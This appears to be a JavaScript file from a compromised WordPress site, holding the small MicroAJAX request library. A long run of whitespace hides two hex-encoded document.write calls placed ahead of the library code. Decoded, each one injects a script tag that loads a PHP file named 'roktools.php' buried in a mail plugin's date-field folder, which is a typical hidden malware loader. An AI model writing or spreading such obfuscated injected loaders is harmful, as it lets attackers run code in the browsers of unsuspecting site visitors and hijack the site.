																																																																							document.write("\x3C\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x72\x63\x3D\x22\x2F\x77\x70\x2D\x63\x6F\x6E\x74\x65\x6E\x74\x2F\x70\x6C\x75\x67\x69\x6E\x73\x2F\x6D\x61\x69\x6C\x70\x72\x65\x73\x73\x2F\x6D\x70\x2D\x69\x6E\x63\x6C\x75\x64\x65\x73\x2F\x63\x6C\x61\x73\x73\x2F\x6F\x70\x74\x69\x6F\x6E\x73\x2F\x66\x6F\x72\x6D\x2F\x66\x69\x65\x6C\x64\x5F\x74\x79\x70\x65\x73\x2F\x64\x61\x74\x65\x2F\x72\x6F\x6B\x74\x6F\x6F\x6C\x73\x2E\x70\x68\x70\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E");document.write("\x3C\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x72\x63\x3D\x22\x2F\x77\x70\x2D\x63\x6F\x6E\x74\x65\x6E\x74\x2F\x70\x6C\x75\x67\x69\x6E\x73\x2F\x6D\x61\x69\x6C\x70\x72\x65\x73\x73\x2F\x6D\x70\x2D\x69\x6E\x63\x6C\x75\x64\x65\x73\x2F\x63\x6C\x61\x73\x73\x2F\x6F\x70\x74\x69\x6F\x6E\x73\x2F\x66\x6F\x72\x6D\x2F\x66\x69\x65\x6C\x64\x5F\x74\x79\x70\x65\x73\x2F\x64\x61\x74\x65\x2F\x72\x6F\x6B\x74\x6F\x6F\x6C\x73\x2E\x70\x68\x70\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E");// MicroAJAX: http://www.blackmac.de/index.php?/archives/31-Smallest-JavaScript-AJAX-library-ever!.html
function microAjax(url,cF){
this.bF=function(caller,object){
return function(){
return caller.apply(object,new Array(object));
}}
this.sC=function(object) {
if (this.r.readyState==4) {
this.cF(this.r.responseText);
}}
this.gR=function(){
if (window.ActiveXObject)
return new ActiveXObject('Microsoft.XMLHTTP');
else if (window.XMLHttpRequest)
return new XMLHttpRequest();
else
return false;
}
if (arguments[2]) this.pb=arguments[2];
else this.pb="";
this.cF=cF;
this.url=url;
this.r=this.gR();
if(this.r){
this.r.onreadystatechange=this.bF(this.sC,this);
if(this.pb!=""){
this.r.open("POST",url,true);
this.r.setRequestHeader('Content-type','application/x-www-form-urlencoded');
this.r.setRequestHeader('Connection','close');
}else{
this.r.open("GET",url,true);
}
this.r.send(this.pb);
}}
